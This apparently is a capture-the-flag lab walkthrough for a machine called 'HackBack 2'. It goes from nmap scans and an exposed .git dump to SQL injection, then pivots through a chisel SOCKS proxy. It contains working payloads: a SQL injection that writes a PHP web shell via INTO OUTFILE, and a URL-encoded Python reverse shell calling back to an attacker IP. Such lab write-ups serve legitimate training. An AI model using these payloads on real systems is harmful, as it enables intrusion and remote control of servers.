Machine Environment
Enumeration
NMAP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1e:11:d6:ab:cc:f2:71:c8:40:e2:1d:97:07:09:6b:eb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvGF7If+TAlknFH/FDMXkhsCJ42eZhvyt/mFDlFw/JyFIWnzTarhTH8MU1o7qrTUUJ3YnlQhu2kjOVlgkL+r48ibhfkzoEmNAIy54kxFLXaC7hFkOpYPehtfCBvxzehclToZq8nsaECbPgEFFOUiFIdQ3yo87CHR1aWeaYh9KdrdObyWUsPRKqNHwVTXXUNhwlLsoJZDJccbH56rdGOpRf3oP1qqWfCUnMDN55o8fkgW0tVLdRFxvuRmlOKdEdCEB6VEDsp2z/QFtuDDSCGPwo1XDqp5SLRGIc+LKhAQZHhnBShaXmnvwLShGLqaU0EAzIBQ96dvNkkTAvZAzazMcN
| 256 cd:d6:f0:67:0e:1b:b3:2c:99:9f:7b:bb:70:42:b5:a5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLaioJd8smxzz0s9lMNoVu95NxoazDCi+ZMZ+sdxtPCiGpesRMmBZjyav7T4REZyqPR6vrvKymnnRio09JGuE6E=
| 256 e1:70:d2:f4:c9:73:6c:f0:d8:1f:d4:d8:a0:9f:8c:fc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsWZhy909do/TDDtLBrrwcU2A6mW99pJq4zV7IT2bG7
80/tcp open http syn-ack nginx 1.14.0 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 10.10.245.245:80/.git/
| Git repository found!
| .git/config matched patterns ‘user’
| Repository description: Unnamed repository; edit this file ‘description’ to name the…
|_ Last commit message: added mobile apk for beta testing.
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Context Information Security — HackBack 2
SSH Version Username Enumeration Exploit
PORT 80
$file config ;cat configconfig: ASCII text
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[user]
name = Context Information Security
email = recruitment@contextis.com
On /info.php
Linux version is 4.4.0–1095 , This is an older version of Linux which can be easily exploited.
Enumerating GIT
Using this Github link .
I found this → http://10.10.245.245/.git/logs/HEAD
$cat HEAD | cut -d ‘ ‘ -f 2
152b2d9976cd37a68fd462af8e4ce21356b5485e
93bab0a450caaa8c4d2632703636eccc69062bb4
79c9539b6566b06d6dec2755fdf58f5f9ec8822f
b2f776a52fe81a731c6c0fa896e7f9548aafceab
04f1f411857cc972ae8ed5efcffa298f5f6168fb
fee5595bb2ba1d1ab005ec3de98367fe5d021e9f
6db3cf70b469de942f2f529166088cdfbbd5f764
```**NOTE:- The first two letter named as a directory**
So I downloaded all commits.
[+] Download and parse index file …
CTX_WSUSpect_White_Paper.pdf
Context_Red_Teaming_Guide.pdf
Context_White_Paper_Pen_Test_101.pdf
Demystifying_the_Exploit_Kit_-_Context_White_Paper.pdf
Glibc_Adventures-The_Forgotten_Chunks.pdf
api.php
functions.php
home.php
index.php
info.php
[OK] api.php
[OK] functions.php
[OK] home.php
[OK] index.php
[OK] info.php
[OK] Context_White_Paper_Pen_Test_101.pdf
[OK] CTX_WSUSpect_White_Paper.pdf
[OK] Glibc_Adventures-The_Forgotten_Chunks.pdf
[OK] Context_Red_Teaming_Guide.pdf
[OK] Demystifying_the_Exploit_Kit_-_Context_White_Paper.pdf
```
Now I have the key I visited that site.
http://10.10.245.245/api.php?apikey=WEBLhvOJAH8d50Z4y5G5
http://10.10.245.245/api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1
So it is using sql connection.
Since we know documentid is the only thing using sql , which might lead to sql injection.
SQL INJECTION
So it is using MYSQL.
API key is Using this function.
I made my payload by analyzing the above code.
http://10.10.20.199/api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1 order by 3
but it will not shows the result.
But it is executing the code.
http://10.10.20.199/api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1%20union%20all%20select%201,2,@@version into outfile ‘/var/www/html/whoami.html
what it does it execute the query and stores in ip/whoami.html
YESSS!!
Now it is time for code Execution
http://10.10.20.199/api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1 union all select 1,2,”<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/rev.php”
!! BOOM!!
http://10.10.20.199/rev.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22IP%22,9001));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
USER WWW-DATA
Flag Location:-
I connected with mysql using these creds.
These are the only things I have in this docker machine.
So I get two ranges :-
1. 172.16.1.0/24
2. 172.18.0.0/16
I Created a php script to upload a file.
Second way to download a file:-
python3
import urllib.request
url= ‘http://IP:8000/chisel'
urllib.request.urlretrieve(url, “chisel”)Pivoting through Reverse Socks Proxy
To Learn this watch :-
https://www.youtube.com/watch?v=Yp4oxoQIBAM AT:- 1:30:48
Step-1 On Attacker
./chisel server -p 8000 -reverse
Step -2 On victim Machine
./chisel client <Your IP>:8000 R:8001:127.0.0.1:1337
Step -3 Again On victim Machine
./chisel server -p 1337 — socks5
Step -4 On Attacker Machine
./chisel client 127.0.0.1:8001 socks
Add this Line at the end of /etc/proxychains.conf
172.16.1.128
VFTPD Exploit
https://www.exploit-db.com/exploits/49757
We are already root user of this machine.
